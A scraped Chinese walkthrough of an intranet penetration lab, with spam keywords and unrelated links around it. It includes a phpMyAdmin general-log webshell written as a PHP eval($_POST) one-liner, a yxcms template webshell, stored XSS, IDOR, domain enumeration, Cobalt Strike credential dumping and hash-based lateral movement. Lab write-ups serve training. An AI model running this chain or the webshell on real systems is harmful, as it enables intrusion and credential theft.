当前位置: 首页 > news >正文

建站模板源码seo网站内容

建站模板源码,seo网站内容,网上商城英文,杭州制作网页与网站一、环境搭建 主机 ip地址 win7外网服务器(两张网卡) 外网:192.168.92.135 内网:192.168.52.143 server2003域成员主机 内网:192.168.52.141 server2008域空主机 内网:192.168.52.138 kali攻击机 …

一、环境搭建

主机

ip地址

win7外网服务器(两张网卡)

外网:192.168.92.135

内网:192.168.52.143

server2003域成员主机

内网:192.168.52.141

server2008域空主机

内网:192.168.52.138

kali攻击机

外网:192.168.92.129

网卡配置

win7使用两张网卡

server2003、server2008

二、信息收集

  1. 端口扫描

Nmap scan report for 192.168.92.135

80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)

3306/tcp open mysql MySQL (unauthorized)

  1. 铭感目录

phpinfo.php、phpmyadmin、yxcms

三、漏洞发现

(一) phpMyAdmin

通过phpmyadmin getshell的方法:phpMydmin的GetShell思路 - FreeBuf网络安全行业门户

弱口令root:root进入后台

通过 select @@datadir;命令得到了物理路径

我们查看secure_file_priv是否为NULL,如果是NULL则无法创建文件

还可以使用日志写入木马,使用 show variables like '%general%';命令查看日志全局变量

使用 set global general_log = "ON";命令开启日志保存,使用set global general_log_file = "C:/phpstudy/WWW/log.php"; 命令更改日志保存路径

使用 select '<?php eval($_POST[pwd]); ?>';命令写入木马

使用蚁剑连接成功

(二) yxcms

1. 主页文件写入木马

通过公告信息发现后台地址默认账号密码

通过弱口令登录成功,在前台模板,编辑首页文件

写入木马

连接成功

2. 存储型XSS

  1. 评论区造成XSS
    在留言版中输入弹窗语句

当后台访问留言版的时候就会弹窗

如果审核通过主页访问留言板也会弹窗

  1. 文件上传pdf造成xss,这里还可以上传flash文件也可以造成xss

访问这个pdf文件地址弹窗

3. 水平越权

注册两个会员用户

在资料完善中

抓包发现id=3我们修改成2

test1账号的资料成功被修改

四、内网渗透

(一) 信息收集

cs生成木马上传蚁剑

ipconfig /all            # 查看本机ip,所在域
route print              # 打印路由信息
arp -a                   # 查看arp缓存
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

先设置间隔时间为0(真实环境默认就好,越快的话就越容易暴露)

shell systeminfo

net config Workstation发现本机是工作站

net view 查看局域网内其他主机名

通过cs得到hash值及明文密码

(二) 横向渗透

在视图查看目标列表

先通过hash值碰撞拿下域控,

创建SMB监听器,选择会话

后面步骤一样的

http://www.sczhlp.com/news/131608/

相关文章:

  • 建网站要会什么wordpress页面连接
  • 推荐6个国外自媒体平台对网站做综合搜索引擎优化分析
  • 做网站的叫什么信息流优化师没经验可以做吗
  • 指数 网站权重浙江省建设工程造价协会网站
  • 反向代理 traefik - 健康检查
  • 一些想法 - CelestialZ
  • 使用 Ansible 批量安装 Docker
  • 编程规范---日志规范
  • 深入解析:find_code 插件 react_vite
  • 湖北人工智能建站系统软件wordpress文章的分享代码
  • 卡片式网站wordpress4.5 ueditor 1.4.3
  • 别人给公司做的网站字体侵权吗asp做的手机网站
  • 自己做个网站用什么软件好企业宣传及介绍ppt
  • 各种颜色做网站给人的心里暗示摄影摄像网站建设
  • 永州网站建设网站seo搜索如何优化
  • 广西建设网站首页哪个网站音乐做的最好的
  • 常德建设局官方网站设计头条官网
  • 二十一、DevOps:从零建设基于K8s的DevOps平台(二)
  • 中电金信:从“通用”到“专用”:加速实现金融行业生成式AI应用的必由之路
  • 自动构建高质量测试集
  • SAP BAPI_PR_CREATE 创建采购申请(含自定义字段)
  • NCCL论文阅读
  • 网站建设 律师wordpress小说站模板
  • 建怎么网站比较赚钱企业网站备案要多久
  • 河南省旅游网站建设泉州建站哪些公司
  • 网站手机端做app开发工具佛山cms模板建站
  • 企业信息网站模板建网站服务器怎么选
  • 新手项目经理如何选工具?2025年这5款上手快、不复杂的项目管理软件适合你
  • 用DiskGenius重新分区,检测出U盘虚标容量。
  • 2025低空经济时空信息平台